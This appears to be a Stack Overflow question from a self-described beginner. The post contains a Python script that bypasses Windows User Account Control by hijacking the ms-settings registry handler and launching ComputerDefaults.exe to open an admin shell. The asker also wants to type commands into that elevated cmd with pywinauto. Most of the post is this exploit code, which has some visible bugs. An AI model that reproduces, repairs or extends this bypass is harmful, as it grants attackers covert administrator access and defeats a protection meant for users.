# Send command to an already running cmd in Python

Tags: python, shell, batch-file, cmd, uac

I have a python script that bypasses the UAC (Bypass User Account Control ) in windows.

I need to then be able to somehow communicate to the opened CMD and pass commands to it. For example: echo testing

Ive only been able to find code that opens a new cmd and communicates to it. However this does not help as i need to communicate to the new one (Currently Running) i created with the UAC bypass.

## UACbypass.py

```
import os
import sys
import ctypes
import winreg


def create_reg_key(key, value):
    try:        
        winreg.CreateKey(winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-            
settings\shell\open\command')
        registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,     'Software\Classes\ms-settings\shell\open\command', 0, winreg.KEY_WRITE)                
        winreg.SetValueEx(registry_key, key, 0, winreg.REG_SZ, value)        
        winreg.CloseKey(registry_key)
    except WindowsError:        
        raise

def exec_bypass_uac(cmd):
    try:
       create_reg_key('DelegateExecute', '')
        create_reg_key(None, cmd)    
    except WindowsError:
        raise

def bypass_uac():        
 try:                
    current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + __file__
    cmd = "C:\windows\System32\cmd.exe"
    exec_bypass_uac(cmd)                
    a=os.system(r'C:\windows\system32\ComputerDefaults.exe')  
    a.SendKeys("aaa")
    return 1               
 except WindowsError:
    sys.exit(1)       

if __name__ == '__main__':

    if bypass_uac():
    
        print ("Enjoy your Admin Shell :)")
```

I am very new to coding and python. Please be nice :)

EDIT:

I have this code below. It sends the keys to a normal cmd process however it does not send it to a cmd with admin rights.

```
from pywinauto import Application

app = Application().connect(process = 16364)
dlg = app.top_window_()
dlg.TypeKeys('hello world')
```

Comment: maybe there is a way to to select the cmd in the background and pass keys from  pynput?

Comment: I'd look into the `subprocess` and `win32com` modules they would at least give you access to process IDs.
https://stackoverflow.com/a/16769956/4777984

Comment: Thank you, I found the process IDs. I can connect to a normal privileged cmd just not a admin for some reason

Comment: I have more info on here about my problem. 
https://stackoverflow.com/questions/56607694/python-auto-input-typekeys-to-cmd-process-that-has-admin-privileges-using-py